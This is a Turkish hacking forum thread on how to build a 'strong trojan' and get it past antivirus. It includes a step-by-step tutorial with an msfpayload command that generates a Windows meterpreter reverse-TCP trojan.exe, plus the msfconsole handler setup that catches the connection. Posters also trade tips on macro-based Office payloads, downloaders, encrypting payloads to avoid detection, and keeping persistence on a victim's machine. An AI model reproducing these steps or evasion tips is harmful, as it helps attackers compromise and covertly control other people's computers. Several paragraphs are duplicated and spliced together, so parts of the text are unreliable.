Güçlü Trojan nasıl Yapılır ?
- Konuyu başlatan Creador
- Başlangıç tarihi
olay fud crypter vs.'de değil ağ trafiğinde / backdoor belli bir ip adresine istek göndericek yani ağ trafiği oluşturucak , burdan kastım şu antivirüslerde sezgisel analiz diye bir koruma var bu sezgisel analizde zararlının sistem üzerindeki davranışlarına göre tespit ediyor istek gönderen backdoor zaten direk olarak belli zaman sonra algılanıcak bundan dolayı 1dk da yakalanmamışsa 5 dk sonra yakalıncak 
/ virüs total gibi imza tabanlı korumayı encrypt vb..teknikler ile atlatmak yeterli değil tabi kullanıcı eski bir antivirüs kullanmıyor ise ki bu çok düşük olasılık
/ virüs total gibi imza tabanlı korumayı encrypt vb..teknikler ile atlatmak yeterli değil tabi kullanıcı eski bir antivirüs kullanmıyor ise ki bu çok düşük olasılıkO zaman git gite bu tür işler imkansız hale geliyor demektir ya da yepyeni yöntemlerle yepyeni yazılımlar gelmesi gerekiyorolay fud crypter vs.'de değil ağ trafiğinde / backdoor belli bir ip adresine istek göndericek yani ağ trafiği oluşturucak , burdan kastım şu antivirüslerde sezgisel analiz diye bir koruma var bu sezgisel analizde zararlının sistem üzerindeki davranışlarına göre tespit ediyor istek gönderen backdoor zaten direk olarak belli zaman sonra algılanıcak bundan dolayı 1dk da yakalanmamışsa 5 dk sonra yakalıncak
o kadar değil encrypt vb.. teknikler ile bypass edilebiliyo (sağlam algoritma+katman oluşturur , kullanırsan) , yeni türeyen zararlı yazılımlar imza tabanlı korumanın zaten en büyük dezavantajı sen gidip njrat serverını şifrelersen 1 saat sonrada patlar hatta o yazılımlar av ler tarafından belkide bin kere veritabanına kalıntısı eklendi , önemli olan gelişmiş sezgisel analizi geçmek / antivirüsler güvenli değil buda bir gerçek en iyi gösterilen kaspersky ın bile false positive oranı %60 ın yukarsında o kadar para veriyorsun av gidip normal bir programa riskli tanısı koyuyor o zaman av satın almak insana mantıksız geliyor tabi bu dediklerimiz kurbanın sistemindeki en zor olasılık ile konuştuğumuz senaryo av kullanmayan çok kişi var oraya girmiyorum bile .
Şöyle bir durumda var. Dediğin çok doğru ama günümüzde artık çoğu hacker özellikle Rus hackerlar basit bir uploader- downloader yapıyor. Bu sayede sisteme dosya yükleyip dosya da indirebiliyor. Öncelikle basit bir script yardımıyla antivirüs bypass edilip daha sonra kendi trojanini yüklüyor. Bunun içinde bir çözüm yok aslında. Basit bir socket kütüphanesini kullanan her hangi bir programlama dili ile yazılıp kullanılıyor. Bunun yanı sıra günümüzde hala açık bulunuyor yakın zamanda yine Office programlarinda açık bulundu. Bu sayede makro payload yapıp sisteme rahat bir şekilde girilebiliyor. Ve 0/73 fud bir şekilde. Tek mantığı herhangi bir word dosyasınin makro bolumune çalıştırılabilir payload kodlarını eklemek. Daha sonra kurbanin dosyayı düzenlemesine izin vermesi... Daha sonra sistemdesin
bahsettiğin downloader - dropper işlemleri sistem üzerindeki bazı zafiyetler yoluylada yapılabilir rce gibi uzaktan kod yürütme ve yetki yükseltmeye olanak sağlayan açıklar / office programları derken follina explotini kastettin galiba - şöyle bir olay da var rar - zip gibi dosyalardan gelen ve autorun özelliğine sahip zararlı yazılımlar , uzantı adını hatırlamıyorum fakat bu tarz malwarelar var ve tespit edilmesi oldukça zor.
Msfpayload ile Payload Oluşturalım
Msfpayload komutu, hedef sisteme göre farklı payloadlar üretebileceğimiz bir komuttur. Payloadlar, hacker’a hedef sistem üzerinde çeşitli şeyler yapabilme hakkı verir. Örneğin bir reverse tcp shell çalıştırabilir yada bir vnc programı çalıştırabilirsiniz.
Daha fazla uzatmadan msfpayload ile trojan yapımı için payloadımızı oluşturalım.
msfpayload windows/meterpreter/reverse_tcp LHOST=ip_adresiniz LPORT=baglantiyi_alacak_port > /Desktop/trojan.exe
Yukarıdaki komut satırı ile trojan.exe adında reverse tcp kullanan bir virüs oluşturmuş olduk. (Bu komut, windowstan kendi makinemize ters tcp bağlantısı sağlayacak bir payload oluşturur) Koyu renk ile belirttiğim “ip_adresiniz” ve “bağlantiyi_alacak_port” bilgilerinizi kendi ip adresiniz ve belirediğiniz bir port olacak şekilde değiştirmelisiniz.
Msfconsole ile Dinleme Moduna Geçelim
- “msfconsole” komutu ile metasploit frameworkünü çalıştıralım.
- “use exploit/multi/handler” komutu ile kullanacağımız exploiti belirtelim. (Bu exploit, trojan.exe’den gelecek tcp bağlantısını alacak)
- “show options” diyerek değişiklik yapmanız gereken bilgileri görün. Bu exploit için bizim LHOST, LPORT ve payload belirtmemiz gerekiyor.
- “set LHOST ip_adresiniz” komutu ile ip adresinizi belirtin.
- “set LPORT baglantiyi_alacak_port” komutu ile bağlantıyı dinleyeceğiniz portu belirtin.
- “set payload windows/meterpreter/reverse_tcp” komutu ile dinleyeceğimiz payloadı belirtin.
- “run” komutu ile dinleme işlemini başlatın.
Bu yazıda, Kali Linux’ta Metasploit frameworkü ve Msfpayload kullanarak nasıl virüs yapılır? sorusuna yanıt vermiş oldum. Trojan yapımı bitti, fakat oluşturduğumuz virüs antivirüs programları ve güvenlik duvarları tarafından tespit edilebiliyor. Bir sonraki yazıda, oluşturmuş olduğumuz virüsü antivirüslere yakalanmaz hale getireceğim. Yani undetectable yapacağım…
Hocam bende diyorum ki neden persistence yaptığımda ertesi gün dinleyemiyorum arka kapıyı meğer antivirüs dediğiniz gibi olağandışı hareketleri tespit ediyormuş bu konularda iyice uzmanlaşmak kendi toollarımı kendim yazmak istiyorum sanırım bi 10 yılı var önerdiğiniz kaynaklar var mıdır çalışmak için
Trojani yaptıktan sonra devamlı algoritma değişerek kodları şifreleyebilirsin. Anti-virüs istenmeyecek türden sayılabilecek yazılım olarak görebilir lâkin virüs olarak görmez.
